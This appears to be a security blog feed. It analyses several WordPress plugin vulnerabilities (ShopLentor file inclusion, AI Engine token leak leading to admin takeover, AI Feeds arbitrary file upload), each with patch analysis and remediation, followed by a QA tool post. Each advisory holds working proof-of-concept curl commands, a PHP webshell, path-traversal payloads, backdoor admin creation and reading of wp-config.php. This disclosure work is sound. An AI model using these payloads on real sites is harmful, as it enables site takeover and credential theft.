     // the source path
     $upload_root_info = GF_Field_FileUpload::get_upload_root_info( $form_id );
-    $path             = str_replace( $upload_root_info['url'], $upload_root_info['path'], $url );
+    if ( ! str_starts_with( $url, $upload_root_info['url'] ) ) {
+        return false;
+    }
+
+    $path = str_replace( $upload_root_info['url'], $upload_root_info['path'], $url );
+    if ( ! file_exists( $path ) ) {
+        return false;
+    }

     // copy the file to the destination path
     if ( ! copy( $path, $new_file ) ) {

The fix is precise and complete. It addresses the root cause directly rather than attempting to block specific file extensions or MIME types. There are no known residual risks from this specific change.

Timeline

Date	Event
Unknown	Vulnerability discovered and reported by Talal Nasraddeen
November 7, 2025	Publicly disclosed by Wordfence
November 7, 2025	Patched version 2.9.21 released

Remediation

Update the gravityforms plugin to version 2.9.21 or later immediately. If you cannot update right away, disable any forms that have post creation enabled with a Post Image field. As an alternative, restrict those forms to authenticated users only.

References

CVE-2025-12493: Local PHP File Inclusion in ShopLentor

hello@hurayraiit.com (Abu Hurayra) — Fri, 05 Dec 2025 00:00:00 GMT

CVE-2025-12493 is a CVSS 9.8 Critical unauthenticated local PHP file inclusion vulnerability in the ShopLentor – WooCommerce Builder for Elementor & Gutenberg +21 Modules WordPress plugin. Any site visitor can extract a public nonce from the page source. With that nonce, they can call the woolentor_load_more_products AJAX action and pass a path-traversal value in the style parameter. This lets them include and run arbitrary .php files on the server — achieving full remote code execution.

Vulnerability Summary

Field	Value
Plugin Name	ShopLentor – WooCommerce Builder for Elementor & Gutenberg +21 Modules – All in One Solution (formerly WooLentor)
Plugin Slug	`woolentor-addons`
CVE ID	CVE-2025-12493
CVSS Score	9.8 (Critical)
CVSS Vector	`CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H`
Vulnerability Type	Unauthenticated Local PHP File Inclusion via `load_template`
Affected Versions	<= 3.2.5
Patched Version	3.2.6
Published	November 3, 2025
Researcher	mikemyers
Wordfence Advisory	Link

Description

ShopLentor (also known as WooLentor) is a WooCommerce page builder plugin for WordPress. All versions up to and including 3.2.5 are vulnerable to Local File Inclusion via the load_template function. Attackers with no login can use this to include and run arbitrary .php files already on the server. An attacker can bypass access controls, steal sensitive data, or achieve full code execution if they can upload a .php file to the server.

Technical Analysis

Vulnerable Code Path

The vulnerability has three connected parts:

1. Nonce Exposed Publicly — `classes/class.assest_management.php:288`

$localizeargs = array(
    'woolentorajaxurl' => admin_url( 'admin-ajax.php' ),
    'ajax_nonce'       => wp_create_nonce( 'woolentor_psa_nonce' ),
);
wp_localize_script( 'woolentor-widgets-scripts', 'woolentor_addons', $localizeargs );

The nonce woolentor_psa_nonce is embedded in every public-facing page as the JavaScript variable woolentor_addons.ajax_nonce. Any site visitor — authenticated or not — can extract this value from the page HTML.

2. AJAX Handler Registered for Unauthenticated Users — `classes/class.ajax_actions.php:40–43`

// Load more products for product grid
add_action( 'wp_ajax_woolentor_load_more_products', [$this, 'load_more_products'] );
add_action( 'wp_ajax_nopriv_woolentor_load_more_products', [$this, 'load_more_products'] );

Since nopriv is registered, the load_more_products handler is callable by anyone — no login required.

3. The `load_more_products` Handler — `classes/class.ajax_actions.php:213–248`

public function load_more_products() {

    if ( ! class_exists( 'WooLentor_Product_Grid_Base' ) ) {
        require_once WOOLENTOR_ADDONS_PL_PATH . 'includes/addons/product-grid/base/class.product-grid-base.php';
    }

    $product_grid_base = new WooLentor_Product_Grid_Base();

    // Verify nonce
    if ( ! isset( $_POST['nonce'] ) || ! wp_verify_nonce( $_POST['nonce'], 'woolentor_psa_nonce' ) ) {
        wp_send_json_error( array( 'message' => __( 'Security check failed', 'woolentor' ) ) );
    }

    // Get settings and page number
    $page = isset( $_POST['page'] ) ? absint( $_POST['page'] ) : 2;

    $setting_data = isset( $_POST['settings'] ) ? (is_string($_POST['settings']) ? stripslashes( $_POST['settings'] ) : '' ) : '';
    $setting_data = json_decode( $setting_data, true );   // <-- attacker-controlled JSON
    $view_layout = isset( $_POST['viewlayout'] ) ? $_POST['viewlayout'] : '';

    if(!empty($view_layout)){
        $setting_data['layout'] = $view_layout;
    }

    $setting_data['paged'] = $page;

    ob_start();
    $product_grid_base->render_items( $setting_data, true );   // <-- passes tainted $setting_data
    $html = ob_get_clean();

    wp_send_json_success( array( 'html' => $html, 'current_page' => $page ));
}

The POST body field settings is JSON-decoded without any sanitization. The code then passes $setting_data directly to render_items(), which passes $setting_data['style'] — fully controlled by the attacker — to load_template().

4. Unsanitized Template Resolution — `includes/addons/product-grid/base/class.product-grid-base.php:302–321`

public function get_template_path( $style, $layout = 'grid' ) {
    $specific_template = $style . '.php';
    $template_path = WOOLENTOR_ADDONS_PL_PATH . 'templates/product-grid/' . $specific_template;

    return apply_filters( 'woolentor_product_grid_template_path', $template_path, $style, $layout );
}

public function load_template( $style, $layout, $products, $settings, $only_items = false ) {
    $template_path = $this->get_template_path( $style, $layout );

    if ( file_exists( $template_path ) ) {
        if ( ! function_exists( 'woocommerce_get_product_thumbnail' ) ) {
            return;
        }
        include $template_path;   // <-- direct PHP include of attacker-supplied path
    }
}

Since there is no whitelist check, no sanitize_key(), and no path traversal prevention, $style flows straight into the file path. PHP's include then executes whatever .php file the resolved path points to — including files reached via ../ sequences.

Root Cause

The root cause is a two-part failure:

Missing input validation: The style key extracted from $_POST['settings'] JSON is never checked against the list of allowed styles (modern, minimalist, editorial, etc.) before being used to construct a file path.
Missing path containment: get_template_path() uses naive string concatenation without calling realpath() or verifying that the resolved path lies within templates/product-grid/. A style value of ../../../../wp-content/uploads/malicious resolves entirely outside the intended directory.

Why Existing Controls Failed

One existing control — a nonce check — was meant to prevent unauthorized calls. However, it failed for a specific reason: the nonce was public.

The nonce check (wp_verify_nonce) looks like a guard, but it is not. The nonce itself is embedded in every public page via wp_localize_script, so anyone can read it. WordPress nonces are not secrets — they are anti-CSRF tokens tied to the current user session. For visitors who are not logged in, the nonce is generated for the zero-user context and stays valid for 24 hours. Any visitor can extract woolentor_addons.ajax_nonce from the page source and reuse it to pass the check.

The nonce only shows the request came from a page with the plugin's scripts loaded. It does not check whether the caller is logged in or allowed to access files.

Attack Impact

Any attacker who can:

Read any page that loads ShopLentor widgets (to get the nonce)
Upload a .php file via any means (a second vulnerability, a publicly-writable directory, or WooCommerce product image upload)

can achieve Remote Code Execution (RCE) by including and running the uploaded file. Even without a pre-uploaded file, the attacker can target existing PHP files on shared hosting (such as configuration files) to leak credentials.

Proof of Concept

Disclaimer: This PoC is provided for educational and defensive security research purposes only.

Prerequisites

WordPress installation with the woolentor-addons plugin installed and activated
WooCommerce active
Plugin version <= 3.2.5
A ShopLentor product grid widget placed on any public page

Step-by-Step Reproduction

Step 1: Extract the public nonce

Visit any page on the target site that renders a ShopLentor product grid (e.g., the homepage or a shop page). The nonce is embedded in the page's inline JavaScript:

# Extract the nonce from the page source
NONCE=$(curl -s "http://target.example.com/shop/" \
  | grep -oP '"ajax_nonce"\s*:\s*"\K[^"]+')
echo "Extracted nonce: $NONCE"

The output of woolentor_addons.ajax_nonce in the JavaScript object in the page source will be the raw nonce value.

Step 2: Prepare a PHP webshell (attacker-controlled server or upload)

For maximum impact, the attacker uploads a PHP file to the server. For example, using a WooCommerce product review image upload or another file-upload vulnerability:

<?php system($_GET['cmd']); ?>

Assume it lands at the WordPress uploads directory, e.g.: /var/www/html/wp-content/uploads/2025/11/shell.php

Step 3: Trigger Local File Inclusion via the AJAX endpoint

Craft the style parameter to traverse out of the templates/product-grid/ directory and point at the uploaded shell. For a typical WordPress layout where the plugin is at wp-content/plugins/woolentor-addons/, the payload needs 4 levels of ../:

curl -s -X POST "http://target.example.com/wp-admin/admin-ajax.php" \
  -d "action=woolentor_load_more_products" \
  -d "nonce=${NONCE}" \
  --data-urlencode 'settings={"style":"../../../../uploads/2025/11/shell","layout":"grid","posts_per_page":1,"query_type":"products","enable_pagination":false}'

The server constructs the path:

/var/www/html/wp-content/plugins/woolentor-addons/templates/product-grid/../../../../uploads/2025/11/shell.php

Which resolves to:

/var/www/html/wp-content/uploads/2025/11/shell.php

Step 4: Verify code execution

After the AJAX request, check the response. The included PHP file's output will be embedded in the html field of the JSON response:

# With a webshell included, add a GET parameter to execute a command
curl -s -X POST "http://target.example.com/wp-admin/admin-ajax.php?cmd=id" \
  -d "action=woolentor_load_more_products" \
  -d "nonce=${NONCE}" \
  --data-urlencode 'settings={"style":"../../../../uploads/2025/11/shell","layout":"grid","posts_per_page":1,"query_type":"products","enable_pagination":false}'

Expected Result

The JSON response will contain the output of id (or whatever command was injected) embedded in the data.html field, confirming RCE as the web server user.

Verification

Inspect the data.html field of the JSON response:

{
  "success": true,
  "data": {
    "html": "uid=33(www-data) gid=33(www-data) groups=33(www-data)\n",
    "current_page": 2
  }
}

A non-empty command output in html confirms successful code execution.

Patch Analysis

What Changed

The patch modifies includes/addons/product-grid/base/class.product-grid-base.php with two layered defenses.

Fix Explanation

Defense 1 — Strict style whitelist in load_template():

 public function load_template( $style, $layout, $products, $settings, $only_items = false ) {
-    $template_path = $this->get_template_path( $style, $layout );
+    $style = isset( $style ) ? sanitize_key( $style ) : 'modern';
+    if ( ! in_array( $style, $this->get_allowed_styles(), true ) ) {
+        $style = 'modern';
+    }
+    $template_path = $this->get_template_path( $style );

Before calling get_template_path(), the code now sanitizes $style with sanitize_key(), which removes special characters, directory separators, and dots. It then checks the value against a private allowlist from get_allowed_styles(). If the value is not in the list, it falls back to modern. In version 3.2.6, the allowlist contains only ['modern'].

Defense 2 — Path containment check in get_template_path():

-public function get_template_path( $style, $layout = 'grid' ) {
-    $specific_template = $style . '.php';
-    $template_path = WOOLENTOR_ADDONS_PL_PATH . 'templates/product-grid/' . $specific_template;
-    return apply_filters( 'woolentor_product_grid_template_path', $template_path, $style, $layout );
-}
+private function get_template_path( string $style ) : string {
+    $base_dir     = wp_normalize_path( WOOLENTOR_ADDONS_PL_PATH . 'templates/product-grid/' );
+    $candidate    = wp_normalize_path( $base_dir . $style . '.php' );
+    $real_base    = wp_normalize_path( realpath( $base_dir ) );
+    $real_target  = wp_normalize_path( realpath( $candidate ) );
+
+    if ( ! $real_target || strpos( $real_target, $real_base ) !== 0 || ! is_file( $real_target ) ) {
+        $fallback = wp_normalize_path( $base_dir . 'modern.php' );
+        return is_file( $fallback ) ? $fallback : '';
+    }
+
+    return apply_filters( 'woolentor_product_grid_template_path', $real_target, $style );
+}

Even if the whitelist were bypassed, a second check protects the server. The new get_template_path() calls realpath() to find the true path on disk, then confirms that path starts with the expected templates/product-grid/ directory. Any path traversal sequence that escapes the directory is caught and replaced with the modern.php fallback.

The fix addresses the root cause at two independent layers — allowlist and path containment. This makes it resistant to both direct exploitation and filter-hook abuse.

Code Diff (Key Changes)

+    private function get_allowed_styles() : array {
+        return [
+            'modern',
+        ];
+    }

     public function load_template( $style, $layout, $products, $settings, $only_items = false ) {
-        $template_path = $this->get_template_path( $style, $layout );
+        $style = isset( $style ) ? sanitize_key( $style ) : 'modern';
+        if ( ! in_array( $style, $this->get_allowed_styles(), true ) ) {
+            $style = 'modern';
+        }
+        $template_path = $this->get_template_path( $style );
 
         if ( file_exists( $template_path ) ) {

Timeline

Date	Event
Unknown	Vulnerability discovered and reported by mikemyers
November 3, 2025	Publicly disclosed by Wordfence
November 4, 2025	Advisory updated; patched version 3.2.6 released

Remediation

Update the woolentor-addons plugin to version 3.2.6 or later.

References

CVE-2025-11749: Privilege Escalation in AI Engine Plugin

hello@hurayraiit.com (Abu Hurayra) — Thu, 04 Dec 2025 00:00:00 GMT

CVE-2025-11749 is a CVSS 9.8 Critical vulnerability in the AI Engine WordPress plugin. It allows an unauthenticated attacker to steal a private authentication token and use it to become a site administrator. When the "No-Auth URL" feature is enabled, the plugin leaks its MCP bearer token through the public WordPress REST API discovery index. An attacker who finds that token can authenticate as an administrator, create backdoor admin accounts, and take over the site.

Vulnerability Summary

Field	Value
Plugin Name	AI Engine – The Chatbot, AI Framework & MCP for WordPress
Plugin Slug	`ai-engine`
CVE ID	CVE-2025-11749
CVSS Score	9.8 (Critical)
CVSS Vector	`CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H`
Vulnerability Type	Unauthenticated Sensitive Information Exposure to Privilege Escalation
Affected Versions	<= 3.1.3
Patched Version	3.1.4
Published	November 4, 2025
Researcher	Emiliano Versini
Wordfence Advisory	Link

Description

The AI Engine plugin (versions up to and including 3.1.3) exposes its private MCP bearer token through the /mcp/v1/ REST API endpoint when the "No-Auth URL" option is enabled. An unauthenticated attacker who finds this token can use it to authenticate as an administrator. From there, they can create new admin accounts and take over the site.

Technical Analysis

Vulnerable Code Path

The vulnerability lives in labs/mcp.php within the rest_api_init() method (lines 98–123).

When the site administrator enables the "No-Auth URL" feature (mcp_noauth_url option), the plugin registers WordPress REST API routes with the private bearer token embedded directly in the URL path:

// labs/mcp.php, lines 98-123
$noauth_enabled = $this->core->get_option( 'mcp_noauth_url' );
if ( $noauth_enabled && !empty( $this->bearer_token ) ) {
  register_rest_route( $this->namespace, '/' . $this->bearer_token . '/sse', [
    'methods' => 'GET',
    'callback' => [ $this, 'handle_sse' ],
    'permission_callback' => function ( $request ) {
      return $this->handle_noauth_access( $request );
    },
  ] );

  register_rest_route( $this->namespace, '/' . $this->bearer_token . '/sse', [
    'methods' => 'POST',
    'callback' => [ $this, 'handle_sse' ],
    'permission_callback' => function ( $request ) {
      return $this->handle_noauth_access( $request );
    },
  ] );

  register_rest_route( $this->namespace, '/' . $this->bearer_token . '/messages', [
    'methods' => 'POST',
    'callback' => [ $this, 'handle_message' ],
    'permission_callback' => function ( $request ) {
      return $this->handle_noauth_access( $request );
    },
  ] );
}

This creates REST routes of the form:

GET /wp-json/mcp/v1/<BEARER_TOKEN>/sse
POST /wp-json/mcp/v1/<BEARER_TOKEN>/sse
POST /wp-json/mcp/v1/<BEARER_TOKEN>/messages

None of these route registrations includes 'show_in_index' => false, so WordPress includes them in its public REST API discovery index.

Full execution path to privilege escalation:

Attacker calls GET /wp-json/ (unauthenticated) → WordPress returns a JSON object listing all registered REST routes, including mcp/v1/<SECRET_TOKEN>/sse and mcp/v1/<SECRET_TOKEN>/messages
Attacker parses the JSON response and extracts <SECRET_TOKEN> from the route path
Attacker sends a JSON-RPC tools/call POST request to /wp-json/mcp/v1/sse with Authorization: Bearer <SECRET_TOKEN> header
The auth_via_bearer_token() filter (lines 144–217) validates the token via hash_equals(), sets the current user to the site administrator (wp_set_current_user($admin->ID)), and grants full access
Attacker calls the wp_create_user MCP tool (defined in labs/mcp-core.php, line 64) with role=administrator to create a backdoor admin account

The wp_create_user tool implementation (labs/mcp-core.php, lines 634–648):

case 'wp_create_user':
  $data = [
    'user_login' => sanitize_user( $a['user_login'] ),
    'user_email' => sanitize_email( $a['user_email'] ),
    'user_pass'  => $a['user_pass'] ?? wp_generate_password( 12, true ),
    'display_name' => sanitize_text_field( $a['display_name'] ?? '' ),
    'role' => sanitize_key( $a['role'] ?? get_option( 'default_role', 'subscriber' ) ),
  ];
  $uid = wp_insert_user( $data );

No role restriction prevents an attacker from passing 'role' => 'administrator'.

Root Cause

The register_rest_route() calls for the No-Auth URL endpoints do not set 'show_in_index' => false. WordPress's REST API discovery index (/wp-json/) enumerates all registered routes by default. Because the secret bearer token is embedded in the route path itself, WordPress exposes it directly in the public discovery response.

Failed Security Controls

The authentication design for the No-Auth URL feature is fundamentally flawed: the bearer token is both the secret and the URL path. Keeping the token secret meant hoping no one would discover the URL. However, WordPress's REST API index makes all route paths publicly accessible, which completely breaks that idea. Once the token is known, the auth_via_bearer_token() function treats it as fully valid and elevates the session to administrator level.

Attack Impact

An unauthenticated remote attacker can:

Extract the MCP bearer token from the public REST API index
Gain administrator-level access to the WordPress site
Create new administrator accounts (persistent backdoor)
Read, modify, or delete any WordPress content, settings, or users
Potentially execute arbitrary code if other MCP tools or plugins permit it

Proof of Concept

Disclaimer: This PoC is provided for educational and defensive security research purposes only.

Prerequisites

WordPress installation with the ai-engine plugin installed and activated
Plugin version <= 3.1.3
The "No-Auth URL" option enabled in AI Engine settings (Settings → MCP → Enable No-Auth URL)
A bearer token configured in AI Engine MCP settings

Step-by-Step Reproduction

Step 1: Discover the bearer token via REST API index

Call the public WordPress REST API discovery endpoint. No authentication is required.

curl -s https://TARGET-SITE.com/wp-json/ | python3 -m json.tool | grep "mcp/v1"

In the response, look for routes matching the pattern mcp/v1/<TOKEN>/sse. The token is the path segment between mcp/v1/ and /sse.

Example output:

"mcp\/v1\/s3cr3t-b34r3r-t0k3n\/sse": { ... },
"mcp\/v1\/s3cr3t-b34r3r-t0k3n\/messages": { ... }

Extract s3cr3t-b34r3r-t0k3n as the bearer token.

Step 2: Verify token validity against the authenticated SSE endpoint

Use the extracted token as a Bearer token against the standard (non-No-Auth) MCP endpoint.

curl -s -X POST https://TARGET-SITE.com/wp-json/mcp/v1/sse \
  -H "Authorization: Bearer s3cr3t-b34r3r-t0k3n" \
  -H "Content-Type: application/json" \
  -d '{"jsonrpc":"2.0","id":1,"method":"initialize","params":{"protocolVersion":"2025-06-18","clientInfo":{"name":"test","version":"1.0"}}}'

A valid JSON-RPC result response confirms the token is accepted and administrator access is granted.

Step 3: List available MCP tools

curl -s -X POST https://TARGET-SITE.com/wp-json/mcp/v1/sse \
  -H "Authorization: Bearer s3cr3t-b34r3r-t0k3n" \
  -H "Content-Type: application/json" \
  -d '{"jsonrpc":"2.0","id":2,"method":"tools/list","params":{}}'

The response lists all available tools, including wp_create_user, wp_update_user, wp_delete_post, and many others.

Step 4: Create a new administrator account

curl -s -X POST https://TARGET-SITE.com/wp-json/mcp/v1/sse \
  -H "Authorization: Bearer s3cr3t-b34r3r-t0k3n" \
  -H "Content-Type: application/json" \
  -d '{
    "jsonrpc": "2.0",
    "id": 3,
    "method": "tools/call",
    "params": {
      "name": "wp_create_user",
      "arguments": {
        "user_login": "backdoor-admin",
        "user_email": "attacker@evil.com",
        "user_pass": "Str0ngP@ssword!",
        "role": "administrator"
      }
    }
  }'

Expected Result

The plugin creates a new WordPress user with administrator role. The attacker now has persistent admin access to the WordPress site and can log in via wp-admin using the credentials they specified.

Verification

After executing Step 4, verify the new account exists:

curl -s -X POST https://TARGET-SITE.com/wp-json/mcp/v1/sse \
  -H "Authorization: Bearer s3cr3t-b34r3r-t0k3n" \
  -H "Content-Type: application/json" \
  -d '{
    "jsonrpc": "2.0",
    "id": 4,
    "method": "tools/call",
    "params": {
      "name": "wp_get_users",
      "arguments": {"search": "backdoor-admin"}
    }
  }'

Or log in to the WordPress admin panel at https://TARGET-SITE.com/wp-admin with backdoor-admin / Str0ngP@ssword!.

Patch Analysis

Changes in Version 3.1.4

Only one file was changed: labs/mcp.php.

The fix adds 'show_in_index' => false to each of the three No-Auth URL route registrations.

Fix Explanation

The show_in_index argument in register_rest_route() controls whether a route appears in the WordPress REST API discovery index (/wp-json/). Setting it to false prevents WordPress from including these token-embedded routes in the public discovery response. The routes still work for clients that already know the URL. The difference is that the token no longer appears in the public index.

This is a targeted fix that addresses the information disclosure root cause. It does not change the underlying No-Auth URL design (which still embeds the token in the route path), so the token remains sensitive. It stops being advertised publicly.

Residual risk: If the bearer token was previously exposed (before patching), it should be rotated, because the fix does not invalidate already-leaked tokens. Site owners should regenerate the MCP bearer token after upgrading.

Code Diff (Key Changes)

-      register_rest_route( $this->namespace, '/' . $this->bearer_token . '/sse', [
-        'methods' => 'GET',
-        'callback' => [ $this, 'handle_sse' ],
-        'permission_callback' => function ( $request ) {
-          return $this->handle_noauth_access( $request );
-        },
-      ] );
+      register_rest_route( $this->namespace, '/' . $this->bearer_token . '/sse', [
+        'methods' => 'GET',
+        'callback' => [ $this, 'handle_sse' ],
+        'permission_callback' => function ( $request ) {
+          return $this->handle_noauth_access( $request );
+        },
+        'show_in_index' => false,
+      ] );

       register_rest_route( $this->namespace, '/' . $this->bearer_token . '/sse', [
         'methods' => 'POST',
         'callback' => [ $this, 'handle_sse' ],
         'permission_callback' => function ( $request ) {
           return $this->handle_noauth_access( $request );
         },
+        'show_in_index' => false,
       ] );

       register_rest_route( $this->namespace, '/' . $this->bearer_token . '/messages', [
         'methods' => 'POST',
         'callback' => [ $this, 'handle_message' ],
         'permission_callback' => function ( $request ) {
           return $this->handle_noauth_access( $request );
         },
+        'show_in_index' => false,
       ] );

Timeline

Date	Event
Unknown	Vulnerability discovered and reported by Emiliano Versini
November 4, 2025	Publicly disclosed by Wordfence
November 5, 2025	Advisory last updated
November 4, 2025	Patched version 3.1.4 released

Remediation

Update the ai-engine plugin to version 3.1.4 or later. After updating, regenerate the MCP Bearer Token in AI Engine settings (Settings → MCP → Bearer Token) to invalidate any previously leaked tokens.

References

CVE-2025-13597: Arbitrary File Upload in AI Feeds Plugin

hello@hurayraiit.com (Abu Hurayra) — Wed, 03 Dec 2025 00:00:00 GMT

CVE-2025-13597 is a CVSS 9.8 Critical unauthenticated arbitrary file upload vulnerability in the AI Feeds WordPress plugin. In all versions up to and including 1.0.11, an unauthenticated attacker can send a single HTTP request to overwrite plugin files with arbitrary content from a GitHub repository they control, making remote code execution possible with no credentials required.

Vulnerability Summary

Field	Value
Plugin Name	AI Feeds
Plugin Slug	`ai-feeds`
CVE ID	CVE-2025-13597
CVSS Score	9.8 (Critical)
CVSS Vector	`CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H`
Vulnerability Type	Unauthenticated Arbitrary File Upload (Unrestricted Upload of File with Dangerous Type)
Affected Versions	<= 1.0.11
Patched Version	1.0.12
Published	November 25, 2025
Researcher	Ryan Kozak
Wordfence Advisory	Link

Description

The AI Feeds plugin for WordPress is vulnerable to arbitrary file uploads due to a missing capability check in the actualizador_git.php file in all versions up to, and including, 1.0.11. This makes it possible for unauthenticated attackers to download arbitrary GitHub repositories and overwrite plugin files on the affected site's server, which may make remote code execution possible.

Technical Analysis

Vulnerable Code Path

The root cause is a standalone PHP script placed directly in the plugin's root directory:

File: actualizador_git.php (lines 1–181)

This file is not included or registered anywhere in the main plugin bootstrap (ai-feeds.php). It is a raw PHP file sitting inside wp-content/plugins/ai-feeds/, making it directly accessible over HTTP with no authentication whatsoever.

Step 1 — GET parameters control the operation (lines 14–17):

$OWNER = $_GET['owner'] ?? 'cibeles';
$REPO  = $_GET['repo']  ?? 'svn_ai-feeds';
$REF   = $_GET['ref']   ?? 'main';
$TOKEN = $_GET['token'] ?? 'PON_AQUI_TU_TOKEN_PAT';

All four parameters that control what repository is downloaded are attacker-controlled GET parameters. No nonce, no WordPress capability check, no IP restriction — nothing.

Step 2 — The only "check" is trivially bypassable (line 26):

if ($TOKEN === '' || $TOKEN === 'PON_AQUI_TU_TOKEN_PAT') {
    http_response_code(400);
    exit("Falta token\n");
}

This simply checks that the token is not empty and not the hardcoded placeholder string PON_AQUI_TU_TOKEN_PAT. An attacker supplies their own valid GitHub Personal Access Token (PAT) — which can be freely obtained — and this check passes.

Step 3 — Downloads an arbitrary GitHub repository as ZIP (lines 31, 140–142):

$apiUrl = "https://api.github.com/repos/{$OWNER}/{$REPO}/zipball/" . rawurlencode($REF);
// ...
curl_download($apiUrl, $zip, $TOKEN);

The script constructs a GitHub API URL from attacker-supplied parameters, then downloads the ZIP of the attacker's repository using curl.

Step 4 — Deletes existing plugin files and overwrites them (lines 158–169):

// 1) Build manifest of paths to keep (mirror)
$keepSet = build_manifest($rootInsideZip);
foreach ($PRESERVE as $p) { $keepSet[trim($p,'/')] = true; }

// 2) Delete from CWD everything not in the repo
mirror_delete_extras($cwd, $keepSet, $PRESERVE);

// 3) Copy the repo into CWD
rrcopy_into($rootInsideZip, $cwd, $PRESERVE);

The script builds a manifest of all files in the downloaded repository. It then deletes every file in getcwd() (the plugin folder) that is not in the attacker's repo, and copies the attacker's files in. Because getcwd() resolves to wp-content/plugins/ai-feeds/, everything written there is web-accessible.

Root Cause

actualizador_git.php was a developer utility script — a GitHub mirror tool. The plugin author used it to push updates from a private GitHub repository directly into a live installation. The plugin author accidentally shipped it with the production build. Because it is a standalone PHP file in the plugin folder:

It is directly accessible via HTTP — no WordPress bootstrap is required.
It has no authentication or authorization check — no is_user_logged_in(), no current_user_can(), no nonce, no secret key.
All parameters that control what is downloaded and where files are written come from user-controlled GET input.

Failed Security Controls

WordPress's built-in security model (nonces, capability checks) only protects code that runs through WordPress (i.e., via wp-load.php). This file bypasses WordPress entirely — it starts with declare(strict_types=1); and contains no require of wp-load.php or ABSPATH guard. Hitting the file URL directly executes plain PHP with full filesystem access.

The only control present — the token check on line 26 — is not a security boundary. It merely prevents accidental triggering with no token. An attacker simply supplies any valid GitHub PAT from their own account. That is enough to pass this check and gain full control of the operation.

Attack Impact

An unauthenticated attacker can:

Overwrite any file in the plugin directory with arbitrary content, including PHP webshells
Delete legitimate plugin files and replace them with malicious versions
Achieve Remote Code Execution (RCE) by placing a PHP webshell in the plugin directory and accessing it via HTTP
Pivot to full WordPress compromise — because the plugin directory is inside wp-content, a placed webshell runs as the web server user and has access to wp-config.php, the database, and the entire filesystem

Proof of Concept

Disclaimer: This PoC is provided for educational and defensive security research purposes only.

Prerequisites

WordPress installation with the ai-feeds plugin installed and activated
Plugin version <= 1.0.11
The attacker controls a GitHub repository (public or private) containing a PHP webshell
The attacker has a GitHub Personal Access Token (PAT) with read access to that repository

Step-by-Step Reproduction

Step 1: Create a malicious GitHub repository

Create a new GitHub repository (e.g., attacker-account/malicious-plugin) containing a PHP webshell file:

# Create a file named shell.php in the repository with this content:
# <?php if(isset($_GET['cmd'])){system($_GET['cmd']);}?>

Push it to GitHub. Create a PAT at https://github.com/settings/tokens with repo (or contents: read) scope.

Step 2: Trigger the vulnerable endpoint

Send a GET request directly to the actualizador_git.php file on the target site. No authentication, no cookies, no WordPress session required:

curl "https://target.com/wp-content/plugins/ai-feeds/actualizador_git.php\
?owner=attacker-account\
&repo=malicious-plugin\
&ref=main\
&token=github_pat_XXXXXXXXXXXXXXXXXXXX"

Expected server response (confirming success):

Descargando attacker-account/malicious-plugin@main ...
Eliminando entradas extra...
Copiando archivos...
OK. Mirror aplicado en: /var/www/html/wp-content/plugins/ai-feeds

Step 3: Execute the webshell

The attacker's shell.php is now present in the plugin directory and is web-accessible:

curl "https://target.com/wp-content/plugins/ai-feeds/shell.php?cmd=id"

Expected output:

uid=33(www-data) gid=33(www-data) groups=33(www-data)

Step 4: Escalate — read wp-config.php for database credentials

curl "https://target.com/wp-content/plugins/ai-feeds/shell.php\
?cmd=cat+/var/www/html/wp-config.php"

Expected Result

The attacker achieves unauthenticated Remote Code Execution as the web server user (www-data or equivalent). From there, they can read wp-config.php, dump the database (including all user password hashes), and create a new administrator account. The site is fully compromised.

Verification

After Step 2, verify the webshell is in place:

curl -I "https://target.com/wp-content/plugins/ai-feeds/shell.php"
# HTTP/1.1 200 OK  →  file exists and PHP is executing

After Step 3, a response containing uid= confirms code execution.

Patch Analysis

Changed Files

File	Change
`actualizador_git.php`	Renamed to `actualizador_git.php.off`
`ai-feeds.php`	Version bumped to 1.0.12
`includes/enqueue.php`	Version strings updated to 1.0.12
`readme.txt` + locale readmes	Changelog entry added; stable tag bumped

Fix Explanation

The fix is a rename: actualizador_git.php → actualizador_git.php.off.

Renaming the file to .off makes it non-executable by PHP (the web server will not parse it as PHP). The file is not deleted — it still exists in the plugin directory — but the .off extension means Apache/Nginx will not invoke the PHP engine for it.

The changelog entry across all locale readme files reads:

Removed internal Git update helper script that was accessible directly

The fix addresses the symptom (the file being PHP-executable) rather than the root cause (missing authentication). A complete fix is to delete the file entirely. If the functionality is still needed, it should only run from the WordPress admin context, protected by a current_user_can('manage_options') check and a nonce.

Code Diff (Key Changes)

diff --git a/actualizador_git.php b/actualizador_git.php.off
similarity index 100%
rename from actualizador_git.php
rename to actualizador_git.php.off

+= 1.0.12 =
+* Removed internal Git update helper script that was accessible directly

Timeline

Date	Event
Before November 25, 2025	Vulnerability discovered and reported by Ryan Kozak
November 25, 2025	Publicly disclosed by Wordfence
November 25, 2025	Patched version 1.0.12 released
December 22, 2025	Plugin closed on WordPress.org plugin directory (Security Issue)

Remediation

Update the ai-feeds plugin to version 1.0.12 or later.

Note: As of December 22, 2025, this plugin has been closed on WordPress.org due to this security issue. If you are currently running any version of this plugin, we strongly recommend you deactivate and remove it entirely until a re-reviewed version becomes available in the plugin directory.

References

FileMock for SQA Engineers: File Upload Testing Made Easy

hello@hurayraiit.com (Abu Hurayra) — Tue, 02 Dec 2025 00:00:00 GMT

As QA engineers, we often spend unnecessary time preparing mock files for testing. Whether it’s checking file uploads, validating API endpoints, or running automated test suites, we constantly need files of different sizes and formats. I recently discovered a free tool called FileMock that makes this entire process much faster and simpler, and I think it’s worth sharing.

Link: https://filemock.com

FileMock is a browser-based mock file generator that works entirely on the client side. There are no uploads, no login requirements, and no servers involved. Everything is processed inside your browser, which keeps your data completely private—perfect for sensitive or internal projects.

What makes the tool so useful is its wide support for file types. You can instantly generate:

• Video: MP4, MOV, AVI, MKV
• Audio: MP3, WAV, OGG
• Images: PNG, JPG, WebP, GIF
• Documents: PDF, DOCX, XLSX, TXT, JSON, CSV

All files are fully functional, not empty placeholders. For QA teams, this means more realistic test scenarios without the hassle of searching for sample files.

Some practical use cases include testing upload validation, preparing mock data for automation, validating storage systems, creating large files for performance testing, and generating media files for processing pipelines.

Since FileMock is fast, free, reliable, and works on any device, it’s a handy tool to bookmark. If you regularly deal with file-based testing, this can save you a lot of time and simplify your workflow.

Smart Job Application Strategies for SQA Engineers

hello@hurayraiit.com (Abu Hurayra) — Tue, 02 Dec 2025 00:00:00 GMT

